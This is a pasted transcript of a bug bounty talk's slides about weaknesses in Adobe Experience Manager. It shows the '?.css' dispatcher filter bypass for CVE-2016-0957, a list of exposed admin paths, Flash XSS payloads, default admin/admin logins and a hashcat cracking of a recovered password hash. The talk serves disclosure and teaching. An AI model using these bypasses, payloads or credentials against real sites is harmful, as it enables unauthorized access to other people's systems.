daily pastebin goal
40%
SHARE
TWEET

Untitled

a guest Jan 22nd, 2019 82 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @fransrosen A story of the passive aggressive sysadmin of AEM or "How to make a talk in 3h 35min"
  2. 2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once
  3. 3. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat
  4. 4. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  5. 5. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957
  6. 6. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest RCE."
  7. 7. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  8. 8. @fransrosen How AEM is structured Adobe "black magic glue"
  9. 9. @fransrosen How AEM is structured Stuff you pay your consultants for Adobe "black magic glue"
  10. 10. @fransrosen Shit no one’s updating Stuff you pay your consultants for Adobe "black magic glue" How AEM is structured
  11. 11. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  12. 12. @fransrosen How AEM is structured Apache HTTP server module
  13. 13. @fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server module
  14. 14. @fransrosen How AEM is structured Apache HTTP server module Pages + metadata + content Reverse proxy+filter
  15. 15. @fransrosen How AEM is structured Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools
  16. 16. @fransrosen How AEM is structured You should not have access to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools
  17. 17. @fransrosen How AEM is structured You should not have access to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content
  18. 18. @fransrosen Creating pages
  19. 19. @fransrosen Creating pages Author creates a new page in the repo
  20. 20. @fransrosen Creating pages Author creates a new page in the repo Goes through the publisher nodes
  21. 21. @fransrosen Creating pages Author creates a new page in the repo Goes through the publisher nodes Dispatcher serves the content
  22. 22. @fransrosen Accessing pages
  23. 23. @fransrosen Accessing pages Dispatcher gets the URL
  24. 24. @fransrosen Accessing pages Dispatcher gets the URL Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  25. 25. @fransrosen Accessing pages Dispatcher gets the URLIf all is OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  26. 26. @fransrosen CVE-2016-0957 aka "I am two years old but I’m inside an enterprise product that no one can or dares to upgrade"
  27. 27. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  28. 28. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  29. 29. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  30. 30. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  31. 31. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  32. 32. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  33. 33. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  34. 34. @fransrosen This is ridiculous
  35. 35. @fransrosen Accessing pages?.css Dispatcher gets the URL?.css
  36. 36. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is OK time
  37. 37. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is OK time Serve from publish node
  38. 38. @fransrosen Publish nodes
  39. 39. @fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs + metadata
  40. 40. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css
  41. 41. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css
  42. 42. @fransrosen …but there’s more!
  43. 43. @fransrosen CRX Explorer /crx/de/index.jsp?.css
  44. 44. @fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css
  45. 45. @fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css
  46. 46. @fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css
  47. 47. @fransrosen Package Manager /crx/packmgr/index.jsp?.css
  48. 48. @fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css
  49. 49. @fransrosen bin/querybuilder /bin/querybuilder.json?.css
  50. 50. @fransrosen bin/querybuilder /bin/querybuilder.json?.css
  51. 51. @fransrosen
  52. 52. @fransrosen bin/querybuilder for SWFs!
  53. 53. @fransrosen bin/querybuilder for SWFs!
  54. 54. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)
  55. 55. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)
  56. 56. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String
  57. 57. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole
  58. 58. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole
  59. 59. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole
  60. 60. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole
  61. 61. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole
  62. 62. @fransrosen Allowing anonymous publish access
  63. 63. @fransrosen Allowing anonymous publish access
  64. 64. @fransrosen Allowing anonymous publish access 🤦
  65. 65. @fransrosen but Peter mentioned RCE?
  66. 66. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  67. 67. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin
  68. 68. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  69. 69. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  70. 70. @fransrosen Patch for CVE-2016-0957
  71. 71. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!
  72. 72. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!
  73. 73. @fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO! WOHO!
  74. 74. @fransrosen Problem 1
  75. 75. @fransrosen Problem 1 🤦
  76. 76. @fransrosen Problem 1 🤦 PRIORITY: nah, bro
  77. 77. @fransrosen Problem 2
  78. 78. @fransrosen Problem 2 💸 💸 💸 💸 💸 💸
  79. 79. @fransrosen Patch for CVE-2016-0957 IRL VERSION
  80. 80. @fransrosen Patch for CVE-2016-0957 IRL
  81. 81. @fransrosen Patch for CVE-2016-0957 IRL
  82. 82. @fransrosen Patch for CVE-2016-0957 IRL
  83. 83. @fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this one
  84. 84. @fransrosen The passive agressive sysadmin
  85. 85. @fransrosen The passive agressive sysadmin 💊 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵💵 💵💵 💵 💵💵💵 💵 + + 💊 💊💊 💊
  86. 86. @fransrosen The passive agressive sysadmin 💊 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵💵 💵💵 💵 💵💵💵 💵 + + 💊 💊💊 💊
  87. 87. @fransrosen I’ve seen this before
  88. 88. @fransrosen AEM
  89. 89. @fransrosen CRX
  90. 90. @fransrosen CRXDE
  91. 91. @fransrosen All other stuff
  92. 92. @fransrosen /system/console
  93. 93. @fransrosen /system/console admin / admin
  94. 94. @fransrosen /system/console admin / admin
  95. 95. @fransrosen Report!
  96. 96. @fransrosen Search time!
  97. 97. @fransrosen Search time!
  98. 98. @fransrosen Search time!
  99. 99. @fransrosen Search time!
  100. 100. @fransrosen WTF
  101. 101. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d 'n')
  102. 102. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d 'n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798
  103. 103. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt
  104. 104. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018
  105. 105. @fransrosen hashcat ftw ih8uall
  106. 106. @fransrosen /system/console
  107. 107. @fransrosen /system/console admin / ih8uall
  108. 108. @fransrosen /system/console
  109. 109. @fransrosen /system/console
  110. 110. @fransrosen Report 2
  111. 111. @fransrosen Report 2
  112. 112. @fransrosen Report 2
  113. 113. @fransrosen Public bug bounty programs with AEM Public responsible disclosure 📼 Private ones 🏨 💊💵
  114. 114. @fransrosen Thanks!
  115. Recommended
  116. Blackboard 9.x Essential Training: Instructors
  117. Blackboard 9.x Essential Training: Instructors
  118. Online Course - LinkedIn Learning
  119. PowerPoint for Teachers: Creating Interactive Lessons
  120. PowerPoint for Teachers: Creating Interactive Lessons
  121. Online Course - LinkedIn Learning
  122. 100 Courses and Counting: David Rivers on Elearning
  123. 100 Courses and Counting: David Rivers on Elearning
  124. Online Course - LinkedIn Learning
  125. DNS hijacking using cloud providers – No verification needed
  126. DNS hijacking using cloud providers – No verification needed
  127. Frans Rosén
  128. Time based CAPTCHA protected SQL injection through SOAP-webservice
  129. Time based CAPTCHA protected SQL injection through SOAP-webservice
  130. Frans Rosén
  131. The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
  132. The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
  133. Frans Rosén
  134. How to steal and modify data using Business Logic flaws - Insecure Direct Object References
  135. How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
  136. Frans Rosén
  137. The AI Rush
  138. The AI Rush
  139. Jean-Baptiste Dumont
  140. AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
  141. AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
  142. Carol Smith
  143. English Español Português Français Deutsch
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top